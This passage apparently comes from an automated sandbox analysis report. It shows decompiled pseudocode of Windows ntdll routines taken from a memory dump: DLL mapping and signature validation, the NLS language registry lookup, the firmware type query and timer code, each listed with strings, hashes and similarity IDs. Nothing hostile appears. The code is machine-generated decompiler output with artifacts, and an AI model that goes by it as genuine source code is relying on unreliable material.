                          				intOrPtr _t107;
                          				signed char* _t108;
                          				intOrPtr _t112;
                          				intOrPtr _t124;
                          				intOrPtr _t125;
                          				intOrPtr _t126;
                          
                          				_t107 = __edx;
                          				_v12 = __ecx;
                          				_t125 =  *((intOrPtr*)(__ecx + 0x20));
                          				_t124 = 0;
                          				_v20 = __edx;
                          				if(E00FFCEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
                          					_t112 = _v8;
                          				} else {
                          					_t112 = 0;
                          					_v8 = 0;
                          				}
                          				if(_t112 != 0) {
                          					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
                          						_t124 = 0xc000007b;
                          						goto L8;
                          					}
                          					_t73 =  *(_t125 + 0x34) | 0x00400000;
                          					 *(_t125 + 0x34) = _t73;
                          					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
                          						goto L3;
                          					}
                          					 *(_t125 + 0x34) = _t73 | 0x01000000;
                          					_t124 = E00FEC9A4( *((intOrPtr*)(_t125 + 0x18)));
                          					if(_t124 < 0) {
                          						goto L8;
                          					} else {
                          						goto L3;
                          					}
                          				} else {
                          					L3:
                          					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
                          						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
                          						L8:
                          						return _t124;
                          					}
                          					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
                          						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
                          							goto L5;
                          						}
                          						_t102 =  *0x10d5780; // 0x0
                          						if((_t102 & 0x00000003) != 0) {
                          							E01065510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
                          							_t102 =  *0x10d5780; // 0x0
                          						}
                          						if((_t102 & 0x00000010) != 0) {
                          							asm("int3");
                          						}
                          						_t124 = 0xc0000428;
                          						goto L8;
                          					}
                          					L5:
                          					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
                          						goto L8;
                          					}
                          					_t77 = _a4 - 0x40000003;
                          					if(_t77 == 0 || _t77 == 0x33) {
                          						_v16 =  *((intOrPtr*)(_t125 + 0x18));
                          						if(E01007D50() != 0) {
                          							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                          						} else {
                          							_t82 = 0x7ffe0384;
                          						}
                          						_t108 = 0x7ffe0385;
                          						if( *_t82 != 0) {
                          							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                          								if(E01007D50() == 0) {
                          									_t97 = 0x7ffe0385;
                          								} else {
                          									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                          								}
                          								if(( *_t97 & 0x00000020) != 0) {
                          									E01067016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
                          								}
                          							}
                          						}
                          						if(_a4 != 0x40000003) {
                          							L14:
                          							_t126 =  *((intOrPtr*)(_t125 + 0x18));
                          							if(E01007D50() != 0) {
                          								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                          							} else {
                          								_t87 = 0x7ffe0384;
                          							}
                          							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                          								if(E01007D50() != 0) {
                          									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                          								}
                          								if(( *_t108 & 0x00000020) != 0) {
                          									E01067016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
                          								}
                          							}
                          							goto L8;
                          						} else {
                          							_v16 = _t125 + 0x24;
                          							_t124 = E0101A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
                          							if(_t124 < 0) {
                          								E00FEB1E1(_t124, 0x1490, 0, _v16);
                          								goto L8;
                          							}
                          							goto L14;
                          						}
                          					} else {
                          						goto L8;
                          					}
                          				}
                          			}

                          Instruction addresses for the listing above (the per-line address column of the decompiler table, detached from the code by extraction): 0x00ff7e4c to 0x00ff7f5a and 0x01049848 to 0x01049993; entries of 0x00000000 marked lines with no address.

                          Strings
                          • minkernel\ntdll\ldrmap.c, xrefs: 010498A2
                          • LdrpCompleteMapModule, xrefs: 01049898
                          • Could not validate the crypto signature for DLL %wZ, xrefs: 01049891
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                          • API String ID: 0-1676968949
                          • Opcode ID: 0708b5f926d0a8ddff9e37676336e96097b02ceb94dd3ae83bc3fe702fb8cf60
                          • Instruction ID: 7101b3ed0d1a25a08e89ea2e09f1deb5f0970211734b92dc075fdbcec4177115
                          • Opcode Fuzzy Hash: 0708b5f926d0a8ddff9e37676336e96097b02ceb94dd3ae83bc3fe702fb8cf60
                          • Instruction Fuzzy Hash: 42510372A08749DBE721DB5CC984B7ABBE4AF04324F1405EAEA919B3E1D774ED00D790
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 93%
                          			E00FEE620(void* __ecx, short* __edx, short* _a4) {
                          				char _v16;
                          				char _v20;
                          				intOrPtr _v24;
                          				char* _v28;
                          				char _v32;
                          				char _v36;
                          				char _v44;
                          				signed int _v48;
                          				intOrPtr _v52;
                          				void* _v56;
                          				void* _v60;
                          				char _v64;
                          				void* _v68;
                          				void* _v76;
                          				void* _v84;
                          				signed int _t59;
                          				signed int _t74;
                          				signed short* _t75;
                          				signed int _t76;
                          				signed short* _t78;
                          				signed int _t83;
                          				short* _t93;
                          				signed short* _t94;
                          				short* _t96;
                          				void* _t97;
                          				signed int _t99;
                          				void* _t101;
                          				void* _t102;
                          
                          				_t80 = __ecx;
                          				_t101 = (_t99 & 0xfffffff8) - 0x34;
                          				_t96 = __edx;
                          				_v44 = __edx;
                          				_t78 = 0;
                          				_v56 = 0;
                          				if(__ecx == 0 || __edx == 0) {
                          					L28:
                          					_t97 = 0xc000000d;
                          				} else {
                          					_t93 = _a4;
                          					if(_t93 == 0) {
                          						goto L28;
                          					}
                          					_t78 = E00FEF358(__ecx, 0xac);
                          					if(_t78 == 0) {
                          						_t97 = 0xc0000017;
                          						L6:
                          						if(_v56 != 0) {
                          							_push(_v56);
                          							E010295D0();
                          						}
                          						if(_t78 != 0) {
                          							L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
                          						}
                          						return _t97;
                          					}
                          					E0102FA60(_t78, 0, 0x158);
                          					_v48 = _v48 & 0x00000000;
                          					_t102 = _t101 + 0xc;
                          					 *_t96 = 0;
                          					 *_t93 = 0;
                          					E0102BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
                          					_v36 = 0x18;
                          					_v28 =  &_v44;
                          					_v64 = 0;
                          					_push( &_v36);
                          					_push(0x20019);
                          					_v32 = 0;
                          					_push( &_v64);
                          					_v24 = 0x40;
                          					_v20 = 0;
                          					_v16 = 0;
                          					_t97 = E01029600();
                          					if(_t97 < 0) {
                          						goto L6;
                          					}
                          					E0102BB40(0,  &_v36, L"InstallLanguageFallback");
                          					_push(0);
                          					_v48 = 4;
                          					_t97 = L00FEF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
                          					if(_t97 >= 0) {
                          						if(_v52 != 1) {
                          							L17:
                          							_t97 = 0xc0000001;
                          							goto L6;
                          						}
                          						_t59 =  *_t78 & 0x0000ffff;
                          						_t94 = _t78;
                          						_t83 = _t59;
                          						if(_t59 == 0) {
                          							L19:
                          							if(_t83 == 0) {
                          								L23:
                          								E0102BB40(_t83, _t102 + 0x24, _t78);
                          								if(L00FF43C0( &_v48,  &_v64) == 0) {
                          									goto L17;
                          								}
                          								_t84 = _v48;
                          								 *_v48 = _v56;
                          								if( *_t94 != 0) {
                          									E0102BB40(_t84, _t102 + 0x24, _t94);
                          									if(L00FF43C0( &_v48,  &_v64) != 0) {
                          										 *_a4 = _v56;
                          									} else {
                          										_t97 = 0xc0000001;
                          										 *_v48 = 0;
                          									}
                          								}
                          								goto L6;
                          							}
                          							_t83 = _t83 & 0x0000ffff;
                          							while(_t83 == 0x20) {
                          								_t94 =  &(_t94[1]);
                          								_t74 =  *_t94 & 0x0000ffff;
                          								_t83 = _t74;
                          								if(_t74 != 0) {
                          									continue;
                          								}
                          								goto L23;
                          							}
                          							goto L23;
                          						} else {
                          							goto L14;
                          						}
                          						while(1) {
                          							L14:
                          							_t27 =  &(_t94[1]); // 0x2
                          							_t75 = _t27;
                          							if(_t83 == 0x2c) {
                          								break;
                          							}
                          							_t94 = _t75;
                          							_t76 =  *_t94 & 0x0000ffff;
                          							_t83 = _t76;
                          							if(_t76 != 0) {
                          								continue;
                          							}
                          							goto L23;
                          						}
                          						 *_t94 = 0;
                          						_t94 = _t75;
                          						_t83 =  *_t75 & 0x0000ffff;
                          						goto L19;
                          					}
                          				}
                          			}
                          Instruction addresses for the listing above (the per-line address column of the decompiler table, detached from the code by extraction): 0x00fee620 to 0x00fee743 and 0x0104542a to 0x01045503; entries of 0x00000000 marked lines with no address.

                          Strings
                          • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 00FEE68C
                          • @, xrefs: 00FEE6C0
                          • InstallLanguageFallback, xrefs: 00FEE6DB
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                          • API String ID: 0-1757540487
                          • Opcode ID: 29e4303ff2990e91ac7a3a569fa2df0f1d99481d55df4d8b5e2cf17614277a59
                          • Instruction ID: ef00adae1cbc27d5b81346d2d65f49de794019e3bc350f53130d69b24f1b5569
                          • Opcode Fuzzy Hash: 29e4303ff2990e91ac7a3a569fa2df0f1d99481d55df4d8b5e2cf17614277a59
                          • Instruction Fuzzy Hash: A351A0B66043569BD711DF28C890AABB3E8BF88714F04097EF995D7240FB34DA04C7A2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 60%
                          			E010AE539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
                          				signed int _v20;
                          				char _v24;
                          				signed int _v40;
                          				char _v44;
                          				intOrPtr _v48;
                          				signed int _v52;
                          				unsigned int _v56;
                          				char _v60;
                          				signed int _v64;
                          				char _v68;
                          				signed int _v72;
                          				void* __ebx;
                          				void* __edi;
                          				char _t87;
                          				signed int _t90;
                          				signed int _t94;
                          				signed int _t100;
                          				intOrPtr* _t113;
                          				signed int _t122;
                          				void* _t132;
                          				void* _t135;
                          				signed int _t139;
                          				signed int* _t141;
                          				signed int _t146;
                          				signed int _t147;
                          				void* _t153;
                          				signed int _t155;
                          				signed int _t159;
                          				char _t166;
                          				void* _t172;
                          				void* _t176;
                          				signed int _t177;
                          				intOrPtr* _t179;
                          
                          				_t179 = __ecx;
                          				_v48 = __edx;
                          				_v68 = 0;
                          				_v72 = 0;
                          				_push(__ecx[1]);
                          				_push( *__ecx);
                          				_push(0);
                          				_t153 = 0x14;
                          				_t135 = _t153;
                          				_t132 = E010ABBBB(_t135, _t153);
                          				if(_t132 == 0) {
                          					_t166 = _v68;
                          					goto L43;
                          				} else {
                          					_t155 = 0;
                          					_v52 = 0;
                          					asm("stosd");
                          					asm("stosd");
                          					asm("stosd");
                          					asm("stosd");
                          					asm("stosd");
                          					_v56 = __ecx[1];
                          					if( *__ecx >> 8 < 2) {
                          						_t155 = 1;
                          						_v52 = 1;
                          					}
                          					_t139 = _a4;
                          					_t87 = (_t155 << 0xc) + _t139;
                          					_v60 = _t87;
                          					if(_t87 < _t139) {
                          						L11:
                          						_t166 = _v68;
                          						L12:
                          						if(_t132 != 0) {
                          							E010ABCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
                          						}
                          						L43:
                          						if(_v72 != 0) {
                          							_push( *((intOrPtr*)(_t179 + 4)));
                          							_push( *_t179);
                          							_push(0x8000);
                          							E010AAFDE( &_v72,  &_v60);
                          						}
                          						L46:
                          						return _t166;
                          					}
                          					_t90 =  *(_t179 + 0xc) & 0x40000000;
                          					asm("sbb edi, edi");
                          					_t172 = ( ~_t90 & 0x0000003c) + 4;
                          					if(_t90 != 0) {
                          						_push(0);
                          						_push(0x14);
                          						_push( &_v44);
                          						_push(3);
                          						_push(_t179);
                          						_push(0xffffffff);
                          						if(E01029730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
                          							_push(_t139);
                          							E010AA80D(_t179, 1, _v40, 0);
                          							_t172 = 4;
                          						}
                          					}
                          					_t141 =  &_v72;
                          					if(E010AA854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
                          						_v64 = _a4;
                          						_t94 =  *(_t179 + 0xc) & 0x40000000;
                          						asm("sbb edi, edi");
                          						_t176 = ( ~_t94 & 0x0000003c) + 4;
                          						if(_t94 != 0) {
                          							_push(0);
                          							_push(0x14);
                          							_push( &_v24);
                          							_push(3);
                          							_push(_t179);
                          							_push(0xffffffff);
                          							if(E01029730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
                          								_push(_t141);
                          								E010AA80D(_t179, 1, _v20, 0);
                          								_t176 = 4;
                          							}
                          						}
                          						if(E010AA854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
                          							goto L11;
                          						} else {
                          							_t177 = _v64;
                          							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
                          							_t100 = _v52 + _v52;
                          							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
                          							 *(_t132 + 0x10) = _t146;
                          							asm("bsf eax, [esp+0x18]");
                          							_v52 = _t100;
                          							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
                          							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
                          							_t47 =  &_a8;
                          							 *_t47 = _a8 & 0x00000001;
                          							if( *_t47 == 0) {
                          								E01002280(_t179 + 0x30, _t179 + 0x30);
                          							}
                          							_t147 =  *(_t179 + 0x34);
                          							_t159 =  *(_t179 + 0x38) & 1;
                          							_v68 = 0;
                          							if(_t147 == 0) {
                          								L35:
                          								E00FFB090(_t179 + 0x34, _t147, _v68, _t132);
                          								if(_a8 == 0) {
                          									E00FFFFB0(_t132, _t177, _t179 + 0x30);
                          								}
                          								asm("lock xadd [eax], ecx");
                          								asm("lock xadd [eax], edx");
                          								_t132 = 0;
                          								_v72 = _v72 & 0;
                          								_v68 = _v72;
                          								if(E01007D50() == 0) {
                          									_t113 = 0x7ffe0388;
                          								} else {
                          									_t177 = _v64;
                          									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                          								}
                          								if( *_t113 == _t132) {
                          									_t166 = _v68;
                          									goto L46;
                          								} else {
                          									_t166 = _v68;
                          									E0109FEC0(_t132, _t179, _t166, _t177 + 0x1000);
                          									goto L12;
                          								}
                          							} else {
                          								L23:
                          								while(1) {
                          									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
                          										_t122 =  *_t147;
                          										if(_t159 == 0) {
                          											L32:
                          											if(_t122 == 0) {
                          												L34:
                          												_v68 = 0;
                          												goto L35;
                          											}
                          											L33:
                          											_t147 = _t122;
                          											continue;
                          										}
                          										if(_t122 == 0) {
                          											goto L34;
                          										}
                          										_t122 = _t122 ^ _t147;
                          										goto L32;
                          									}
                          									_t122 =  *(_t147 + 4);
                          									if(_t159 == 0) {
                          										L27:
                          										if(_t122 != 0) {
                          											goto L33;
                          										}
                          										L28:
                          										_v68 = 1;
                          										goto L35;
                          									}
                          									if(_t122 == 0) {
                          										goto L28;
                          									}
                          									_t122 = _t122 ^ _t147;
                          									goto L27;
                          								}
                          							}
                          						}
                          					}
                          					_v72 = _v72 & 0x00000000;
                          					goto L11;
                          				}
                          			}

                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID: `$`
                          • API String ID: 0-197956300
                          • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                          • Instruction ID: ea66b2fc3411c237b1b37f46d7f50c541f365a237079b439334ed6c555d98530
                          • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                          • Instruction Fuzzy Hash: C891BF312043429FE764CEA9C841B6BBBE5BF84714F54896DF6D9CB280E774E904CB52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 77%
                          			E010651BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                          				signed short* _t63;
                          				signed int _t64;
                          				signed int _t65;
                          				signed int _t67;
                          				intOrPtr _t74;
                          				intOrPtr _t84;
                          				intOrPtr _t88;
                          				intOrPtr _t94;
                          				void* _t100;
                          				void* _t103;
                          				intOrPtr _t105;
                          				signed int _t106;
                          				short* _t108;
                          				signed int _t110;
                          				signed int _t113;
                          				signed int* _t115;
                          				signed short* _t117;
                          				void* _t118;
                          				void* _t119;
                          
                          				_push(0x80);
                          				_push(0x10c05f0);
                          				E0103D0E8(__ebx, __edi, __esi);
                          				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
                          				_t115 =  *(_t118 + 0xc);
                          				 *(_t118 - 0x7c) = _t115;
                          				 *((char*)(_t118 - 0x65)) = 0;
                          				 *((intOrPtr*)(_t118 - 0x64)) = 0;
                          				_t113 = 0;
                          				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
                          				 *((intOrPtr*)(_t118 - 4)) = 0;
                          				_t100 = __ecx;
                          				if(_t100 == 0) {
                          					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                          					E00FFEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                          					 *((char*)(_t118 - 0x65)) = 1;
                          					_t63 =  *(_t118 - 0x90);
                          					_t101 = _t63[2];
                          					_t64 =  *_t63 & 0x0000ffff;
                          					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                          					L20:
                          					_t65 = _t64 >> 1;
                          					L21:
                          					_t108 =  *((intOrPtr*)(_t118 - 0x80));
                          					if(_t108 == 0) {
                          						L27:
                          						 *_t115 = _t65 + 1;
                          						_t67 = 0xc0000023;
                          						L28:
                          						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
                          						L29:
                          						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
                          						E010653CA(0);
                          						return E0103D130(0, _t113, _t115);
                          					}
                          					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
                          						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
                          							 *_t108 = 0;
                          						}
                          						goto L27;
                          					}
                          					 *_t115 = _t65;
                          					_t115 = _t65 + _t65;
                          					E0102F3E0(_t108, _t101, _t115);
                          					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
                          					_t67 = 0;
                          					goto L28;
                          				}
                          				_t103 = _t100 - 1;
                          				if(_t103 == 0) {
                          					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
                          					_t74 = E01003690(1, _t117, 0xfc1810, _t118 - 0x74);
                          					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
                          					_t101 = _t117[2];
                          					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                          					if(_t74 < 0) {
                          						_t64 =  *_t117 & 0x0000ffff;
                          						_t115 =  *(_t118 - 0x7c);
                          						goto L20;
                          					}
                          					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
                          					_t115 =  *(_t118 - 0x7c);
                          					goto L21;
                          				}
                          				if(_t103 == 1) {
                          					_t105 = 4;
                          					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
                          					 *((intOrPtr*)(_t118 - 0x70)) = 0;
                          					_push(_t118 - 0x70);
                          					_push(0);
                          					_push(0);
                          					_push(_t105);
                          					_push(_t118 - 0x78);
                          					_push(0x6b);
                          					 *((intOrPtr*)(_t118 - 0x64)) = E0102AA90();
                          					 *((intOrPtr*)(_t118 - 0x64)) = 0;
                          					_t113 = L01004620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
                          					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
                          					if(_t113 != 0) {
                          						_push(_t118 - 0x70);
                          						_push( *((intOrPtr*)(_t118 - 0x70)));
                          						_push(_t113);
                          						_push(4);
                          						_push(_t118 - 0x78);
                          						_push(0x6b);
                          						_t84 = E0102AA90();
                          						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
                          						if(_t84 < 0) {
                          							goto L29;
                          						}
                          						_t110 = 0;
                          						_t106 = 0;
                          						while(1) {
                          							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
                          							 *(_t118 - 0x88) = _t106;
                          							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
                          								break;
                          							}
                          							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
                          							_t106 = _t106 + 1;
                          						}
                          						_t88 = E0106500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
                          						_t119 = _t119 + 0x1c;
                          						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
                          						if(_t88 < 0) {
                          							goto L29;
                          						}
                          						_t101 = _t118 - 0x3c;
                          						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
                          						goto L21;
                          					}
                          					_t67 = 0xc0000017;
                          					goto L28;
                          				}
                          				_push(0);
                          				_push(0x20);
                          				_push(_t118 - 0x60);
                          				_push(0x5a);
                          				_t94 = E01029860();
                          				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
                          				if(_t94 < 0) {
                          					goto L29;
                          				}
                          				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
                          					_t101 = L"Legacy";
                          					_push(6);
                          				} else {
                          					_t101 = L"UEFI";
                          					_push(4);
                          				}
                          				_pop(_t65);
                          				goto L21;
                          			}

                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID: InitializeThunk
                          • String ID: Legacy$UEFI
                          • API String ID: 2994545307-634100481
                          • Opcode ID: 27c6ee239f5b2eaa600cd03496deae4fba3e420246e108720e55bd5c29c41fab
                          • Instruction ID: 122933dc0bdde9ee1c66bef31de420ef0877b5863a097cc5e82ea0c876e6fe7b
                          • Opcode Fuzzy Hash: 27c6ee239f5b2eaa600cd03496deae4fba3e420246e108720e55bd5c29c41fab
                          • Instruction Fuzzy Hash: BF514D71A0061A9FDB25DFA8CD40BAEBBF8FF48740F14806DE689EB291D7719940CB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 76%
                          			E0100B944(signed int* __ecx, char __edx) {
                          				signed int _v8;
                          				signed int _v16;
                          				signed int _v20;
                          				char _v28;
                          				signed int _v32;
                          				char _v36;
                          				signed int _v40;
                          				intOrPtr _v44;
                          				signed int* _v48;
                          				signed int _v52;
                          				signed int _v56;
                          				intOrPtr _v60;
                          				intOrPtr _v64;
                          				intOrPtr _v68;
                          				intOrPtr _v72;
                          				intOrPtr _v76;
                          				char _v77;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				intOrPtr* _t65;
                          				intOrPtr _t67;
                          				intOrPtr _t68;
                          				char* _t73;
                          				intOrPtr _t77;
                          				intOrPtr _t78;
                          				signed int _t82;
                          				intOrPtr _t83;
                          				void* _t87;
                          				char _t88;
                          				intOrPtr* _t89;
                          				intOrPtr _t91;
                          				void* _t97;
                          				intOrPtr _t100;
                          				void* _t102;
                          				void* _t107;
                          				signed int _t108;
                          				intOrPtr* _t112;
                          				void* _t113;
                          				intOrPtr* _t114;
                          				intOrPtr _t115;
                          				intOrPtr _t116;
                          				intOrPtr _t117;
                          				signed int _t118;
                          				void* _t130;
                          
                          				_t120 = (_t118 & 0xfffffff8) - 0x4c;
                          				_v8 =  *0x10dd360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
                          				_t112 = __ecx;
                          				_v77 = __edx;
                          				_v48 = __ecx;
                          				_v28 = 0;
                          				_t5 = _t112 + 0xc; // 0x575651ff
                          				_t105 =  *_t5;
                          				_v20 = 0;
                          				_v16 = 0;
                          				if(_t105 == 0) {
                          					_t50 = _t112 + 4; // 0x5de58b5b
                          					_t60 =  *__ecx |  *_t50;
                          					if(( *__ecx |  *_t50) != 0) {
                          						 *__ecx = 0;
                          						__ecx[1] = 0;
                          						if(E01007D50() != 0) {
                          							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                          						} else {
                          							_t65 = 0x7ffe0386;
                          						}
                          						if( *_t65 != 0) {
                          							E010B8CD6(_t112);
                          						}
                          						_push(0);
                          						_t52 = _t112 + 0x10; // 0x778df98b
                          						_push( *_t52);
                          						_t60 = E01029E20();
                          					}
                          					L20:
                          					_pop(_t107);
                          					_pop(_t113);
                          					_pop(_t87);
                          					return E0102B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
                          				}
                          				_t8 = _t112 + 8; // 0x8b000cc2
                          				_t67 =  *_t8;
                          				_t88 =  *((intOrPtr*)(_t67 + 0x10));
                          				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
                          				_t108 =  *(_t67 + 0x14);
                          				_t68 =  *((intOrPtr*)(_t105 + 0x14));
                          				_t105 = 0x2710;
                          				asm("sbb eax, edi");
                          				_v44 = _t88;
                          				_v52 = _t108;
                          				_t60 = E0102CE00(_t97, _t68, 0x2710, 0);
                          				_v56 = _t60;
                          				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
                          					L3:
                          					 *(_t112 + 0x44) = _t60;
                          					_t105 = _t60 * 0x2710 >> 0x20;
                          					 *_t112 = _t88;
                          					 *(_t112 + 4) = _t108;
                          					_v20 = _t60 * 0x2710;
                          					_v16 = _t60 * 0x2710 >> 0x20;
                          					if(_v77 != 0) {
                          						L16:
                          						_v36 = _t88;
                          						_v32 = _t108;
                          						if(E01007D50() != 0) {
                          							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                          						} else {
                          							_t73 = 0x7ffe0386;
                          						}
                          						if( *_t73 != 0) {
                          							_t105 = _v40;
                          							E010B8F6A(_t112, _v40, _t88, _t108);
                          						}
                          						_push( &_v28);
                          						_push(0);
                          						_push( &_v36);
                          						_t48 = _t112 + 0x10; // 0x778df98b
                          						_push( *_t48);
                          						_t60 = E0102AF60();
                          						goto L20;
                          					} else {
                          						_t89 = 0x7ffe03b0;
                          						do {
                          							_t114 = 0x7ffe0010;
                          							do {
                          								_t77 =  *0x10d8628; // 0x0
                          								_v68 = _t77;
                          								_t78 =  *0x10d862c; // 0x0
                          								_v64 = _t78;
                          								_v72 =  *_t89;
                          								_v76 =  *((intOrPtr*)(_t89 + 4));
                          								while(1) {
                          									_t105 =  *0x7ffe000c;
                          									_t100 =  *0x7ffe0008;
                          									if(_t105 ==  *_t114) {
                          										goto L8;
                          									}
                          									asm("pause");
                          								}
                          								L8:
                          								_t89 = 0x7ffe03b0;
                          								_t115 =  *0x7ffe03b0;
                          								_t82 =  *0x7FFE03B4;
                          								_v60 = _t115;
                          								_t114 = 0x7ffe0010;
                          								_v56 = _t82;
                          							} while (_v72 != _t115 || _v76 != _t82);
                          							_t83 =  *0x10d8628; // 0x0
                          							_t116 =  *0x10d862c; // 0x0
                          							_v76 = _t116;
                          							_t117 = _v68;
                          						} while (_t117 != _t83 || _v64 != _v76);
                          						asm("sbb edx, [esp+0x24]");
                          						_t102 = _t100 - _v60 - _t117;
                          						_t112 = _v48;
                          						_t91 = _v44;
                          						asm("sbb edx, eax");
                          						_t130 = _t105 - _v52;
                          						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
                          							_t88 = _t102 - _t91;
                          							asm("sbb edx, edi");
                          							_t108 = _t105;
                          						} else {
                          							_t88 = 0;
                          							_t108 = 0;
                          						}
                          						goto L16;
                          					}
                          				} else {
                          					if( *(_t112 + 0x44) == _t60) {
                          						goto L20;
                          					}
                          					goto L3;
                          				}
                          			}

                          APIs
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0100B9A5
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                          • String ID:
                          • API String ID: 885266447-0
                          • Opcode ID: 901157f6889ccdb7074be568850ac79e3644e97e4f966d820bba2c0a64d5a5cf
                          • Instruction ID: d3b2efc54865fe87708270c9f371d02c2dec173c6a7fff52a2a66bd7aa80037b
                          • Opcode Fuzzy Hash: 901157f6889ccdb7074be568850ac79e3644e97e4f966d820bba2c0a64d5a5cf
                          • Instruction Fuzzy Hash: C6517775A08701CFE762CF6CC08092BBBE5FB88610F1489AEE9D587395D771E840CB92
